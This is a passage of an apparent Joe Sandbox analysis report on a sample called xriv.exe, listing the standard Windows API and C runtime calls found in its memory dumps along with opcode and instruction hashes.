                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: c62f55fe58f9910159445efacab8ca49a08d8877f43b52dc66e0f51e33713704
                                                                        • Instruction ID: 1bcd42fdc15c31530997a960ebe8eea6d5c9612fda68010b446d57f576f595cb
                                                                        • Opcode Fuzzy Hash: c62f55fe58f9910159445efacab8ca49a08d8877f43b52dc66e0f51e33713704
                                                                        • Instruction Fuzzy Hash: 89F08230600219FFDB219B55DA09BDD7EA9EB44B55F100094BA40A2090CB798A10DF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,010BB0E0), ref: 010BB1D0
                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 010BB22A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010BB0E0,?,000000FF,00000000,00000000), ref: 010BB2B8
                                                                        • __dosmaperr.LIBCMT ref: 010BB2BF
                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 010BB2FC
                                                                          • Part of subcall function 010BB524: __dosmaperr.LIBCMT ref: 010BB559
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                        • String ID:
                                                                        • API String ID: 1206951868-0
                                                                        • Opcode ID: 66e47f3e0cdde40f876d8f27918805a0839fcd00e94a5b7ce55f87b12c58da67
                                                                        • Instruction ID: 48204809618d2ec27052127abef1deb444b664dd536fdb17ea18dfa0c11ea78c
                                                                        • Opcode Fuzzy Hash: 66e47f3e0cdde40f876d8f27918805a0839fcd00e94a5b7ce55f87b12c58da67
                                                                        • Instruction Fuzzy Hash: 91415D75900645AFDB24DFB9D8849EFBBF9FF88700B04852EE996D3610EB359900CB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C13B4
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C13C6
                                                                        • _free.LIBCMT ref: 010C13D8
                                                                        • _free.LIBCMT ref: 010C13EA
                                                                        • _free.LIBCMT ref: 010C13FC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 41a5ee0dd7a7bc12f111013116e95007571a18a28ac3312e7de76542ad5edd48
                                                                        • Instruction ID: 9d9e3222ba2e663031b9e95e6ba3a2b73634dcfc779159cfed645199917e7bff
                                                                        • Opcode Fuzzy Hash: 41a5ee0dd7a7bc12f111013116e95007571a18a28ac3312e7de76542ad5edd48
                                                                        • Instruction Fuzzy Hash: 75F04F32505605A7D660EB9DF0C1C8AB7D9BA18B2C354C84AE6DCD7941CA35F8C08B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: *?
                                                                        • API String ID: 269201875-2564092906
                                                                        • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction ID: f669c489c7c9eeeac80638a082893e54ecd3b9f03868e2202048128c139bb0b1
                                                                        • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction Fuzzy Hash: A1613CB6D0021A9FDB15DFA9C8C09EEFBF5EF58310B2481AAD855E7300D671AE418B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010B8FA2
                                                                        • CatchIt.LIBVCRUNTIME ref: 010B9088
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        • Opcode ID: 30b14ed3ba177926c50e986a23b6b01a6295d781859c2ec1d1ffdf170a0f255a
                                                                        • Instruction ID: 5ff2269fc43e8377915675d5bc0d11536606ee2271dd7eec34dff108e29399ad
                                                                        • Opcode Fuzzy Hash: 30b14ed3ba177926c50e986a23b6b01a6295d781859c2ec1d1ffdf170a0f255a
                                                                        • Instruction Fuzzy Hash: 0141287190020AEFDF16DF98C980AEEBBB6FF48304F188099FA44A6261D3359950DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: a470ef910e1370d50a475a0921ffd63ad0eb46ebef61fc20079315d5bce9c4ee
                                                                        • Instruction ID: eec4792fcf84908053908738c7b7e4d48e546dd306f3bc48da13aedc7bbb4d20
                                                                        • Opcode Fuzzy Hash: a470ef910e1370d50a475a0921ffd63ad0eb46ebef61fc20079315d5bce9c4ee
                                                                        • Instruction Fuzzy Hash: 6251B4716012069FFB298F58D8C0BFABBE8EF04611F18856EDA81566B1E731A980C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(0000011C,?,C73353B8,00000000), ref: 010A4D89
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A4DF0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010A4DF7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcVersion
                                                                        • String ID:
                                                                        • API String ID: 3310240892-0
                                                                        • Opcode ID: 7556fc6967240e6ebb39814b5086f1645ed0faf0810dcc8d4eb49c8e43043e44
                                                                        • Instruction ID: 39394889c24fd08807dbd8b83e4445201b7434b562d996258f678e704c0471fa
                                                                        • Opcode Fuzzy Hash: 7556fc6967240e6ebb39814b5086f1645ed0faf0810dcc8d4eb49c8e43043e44
                                                                        • Instruction Fuzzy Hash: B7513874D042189BEB24EFA8CD887DDBF74EB45310F9442A9E584E72C1EB755EC08B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C509E
                                                                        • _free.LIBCMT ref: 010C50C7
                                                                        • SetEndOfFile.KERNEL32(00000000,010C25FD,00000000,010BD4F0,?,?,?,?,?,?,?,010C25FD,010BD4F0,00000000), ref: 010C50F9
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,010C25FD,010BD4F0,00000000,?,?,?,?,00000000), ref: 010C5115
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 1547350101-0
                                                                        • Opcode ID: 8f474f09d7f1fe46b4ba81f8baff00c3499c65b34d7d97818b2aeeb75463a522
                                                                        • Instruction ID: 7bf83504c62c9fcb9c4852695fc626885d3e4241fd17aa086b99cc9d42edd0bd
                                                                        • Opcode Fuzzy Hash: 8f474f09d7f1fe46b4ba81f8baff00c3499c65b34d7d97818b2aeeb75463a522
                                                                        • Instruction Fuzzy Hash: B541F87AA006069BDB11ABACCC85ADE3BB5AF54B20F380158F994E7191EA30E4404FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 010BAE0F: _free.LIBCMT ref: 010BAE1D
                                                                          • Part of subcall function 010C0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010C4B40,?,00000000,00000000), ref: 010C0A13
                                                                        • GetLastError.KERNEL32 ref: 010BFA02
                                                                        • __dosmaperr.LIBCMT ref: 010BFA09
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 010BFA48
                                                                        • __dosmaperr.LIBCMT ref: 010BFA4F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        • Opcode ID: 4b1eb84ac5eec1ac993bbda22f87b329a7530f2b8a70ffbe31486624d2353ae8
                                                                        • Instruction ID: 0428179a50e6c349489faee242d610cb34972cbecef34b5ca0d3a091a8341f0d
                                                                        • Opcode Fuzzy Hash: 4b1eb84ac5eec1ac993bbda22f87b329a7530f2b8a70ffbe31486624d2353ae8
                                                                        • Instruction Fuzzy Hash: 0F21C5B2600207BF9B25AF698CC09EBB7EDFF052647144559F999D7241EB31ED40CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,?,010BAD8D,00000000,?,?,?,010BAF26,?), ref: 010BDF49
                                                                        • _free.LIBCMT ref: 010BDFA6
                                                                        • _free.LIBCMT ref: 010BDFDC
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,010BAF26,?), ref: 010BDFE7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: fb8bf12d0b35ff2ede058c00b7c3d2f0ffbeabe7e5a97c18960be4686b6e4425
                                                                        • Instruction ID: ea346ec9cf1157c15a936cc33c3ba66eb3456e8263e0ecce1e4f78fc854256f2
                                                                        • Opcode Fuzzy Hash: fb8bf12d0b35ff2ede058c00b7c3d2f0ffbeabe7e5a97c18960be4686b6e4425
                                                                        • Instruction Fuzzy Hash: 9311C63620D5032AD66137F9ECC4DEB69AADBD167C7244225F6D883280DF258C458310
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,010BB7F5,010BDB7F,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BE0A0
                                                                        • _free.LIBCMT ref: 010BE0FD
                                                                        • _free.LIBCMT ref: 010BE133
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BE13E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: 5f5a2bffee5253bb3be24b4f608f7fe5b6a13eab2925daf3701d37b4e4dfcf24
                                                                        • Instruction ID: fea448770b889213e91753c31e422f774fb8f1596a4b72e83f6bff269d9b0244
                                                                        • Opcode Fuzzy Hash: 5f5a2bffee5253bb3be24b4f608f7fe5b6a13eab2925daf3701d37b4e4dfcf24
                                                                        • Instruction Fuzzy Hash: 8111C8762096022AD67127B9ECC4DEB25AEDBD1678B354325F6E8833C0DF7A8C854350
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010BE9E2,00000000,?,010C370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 010BE893
                                                                        • GetLastError.KERNEL32(?,010C370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,010BE9E2,00000000,00000104,?), ref: 010BE89D
                                                                        • __dosmaperr.LIBCMT ref: 010BE8A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: 432f8992eeadb08db929201ba7f206005e2ccfa0853a2f75b81f0538d106907d
                                                                        • Instruction ID: da6ec2370f07c2431e7295487884c33de95fa4162b1798ed97a957e284bb2c9f
                                                                        • Opcode Fuzzy Hash: 432f8992eeadb08db929201ba7f206005e2ccfa0853a2f75b81f0538d106907d
                                                                        • Instruction Fuzzy Hash: 56F08132600516BF9B201FA6DC888DABFAAFF542A03044961F99DC6110C732E860CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010BE9E2,00000000,?,010C3695,00000000,00000000,010BE9E2,?,?,00000000,00000000,00000001), ref: 010BE8FC
                                                                        • GetLastError.KERNEL32(?,010C3695,00000000,00000000,010BE9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,010BE9E2,00000000,00000104), ref: 010BE906
                                                                        • __dosmaperr.LIBCMT ref: 010BE90D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: c9e18eb0d5d3b7ed1a821f20d59fee66289a96da7b87aa973c132e7b4a873f69
                                                                        • Instruction ID: 86936602a1237a7411a238203728e9d1335ff4e1347f358c47538836912f1cc1
                                                                        • Opcode Fuzzy Hash: c9e18eb0d5d3b7ed1a821f20d59fee66289a96da7b87aa973c132e7b4a873f69
                                                                        • Instruction Fuzzy Hash: 97F08C32200116BF8B701FA6C8889DAFFAAFF842A03044514FA9CC6110CB31E862CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(010A5140,0000000F,010D68F8,00000000,010A5140,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140), ref: 010C63A6
                                                                        • GetLastError.KERNEL32(?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000,010A5140,?,010C3421,010A5140), ref: 010C63B2
                                                                          • Part of subcall function 010C6378: CloseHandle.KERNEL32(FFFFFFFE,010C63C2,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000,010A5140), ref: 010C6388
                                                                        • ___initconout.LIBCMT ref: 010C63C2
                                                                          • Part of subcall function 010C633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010C6369,010C5A94,010A5140,?,010C2ECD,00000000,?,010A5140,00000000), ref: 010C634D
                                                                        • WriteConsoleW.KERNEL32(010A5140,0000000F,010D68F8,00000000,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000), ref: 010C63D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: fd8a0b7f683fa17572d686cce490fd0120e4a7df2e9abda474a6e249786521fe
                                                                        • Instruction ID: 2dc28792d4a387f0f0e7a70cf55aa9c1a22f19769a6fe197f09b64c8760b7c21
                                                                        • Opcode Fuzzy Hash: fd8a0b7f683fa17572d686cce490fd0120e4a7df2e9abda474a6e249786521fe
                                                                        • Instruction Fuzzy Hash: A9F01C36401265BBCF721F95EC08A8D3F6AFB097A1B148014FE9895220C6378960DF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,010B7157,00000064), ref: 010B71DD
                                                                        • LeaveCriticalSection.KERNEL32(010D9708,000000FF,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71E7
                                                                        • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71F8
                                                                        • EnterCriticalSection.KERNEL32(010D9708,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71FF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: 81352007eb94421989410afe8a3bb33e65ff025bdd94a0bd65ce355f238c7dc6
                                                                        • Instruction ID: 581986280d3fcaee8af8fe1b44d0ebdc7bd24e402a60deb26b44112ab1155653
                                                                        • Opcode Fuzzy Hash: 81352007eb94421989410afe8a3bb33e65ff025bdd94a0bd65ce355f238c7dc6
                                                                        • Instruction Fuzzy Hash: 66E01A32641224AFCA221F95EC49ACD3E69FB48A66B020010FEC966154CB6B69109FE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        • Opcode ID: 8096c2cb603f3a135269b42e4777f10cdf7fbce4c08b3f3b65bcf5e97a873a24
                                                                        • Instruction ID: 1b5366fb931668b5063f5589b3fa854662dca6ba8b1daa2f5cbc3bf0a774bc16
                                                                        • Opcode Fuzzy Hash: 8096c2cb603f3a135269b42e4777f10cdf7fbce4c08b3f3b65bcf5e97a873a24
                                                                        • Instruction Fuzzy Hash: BA41B771E00219AFDB21DF9DD9C09EEBBF8EF95714F1000AAF584D7200D6718A40CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%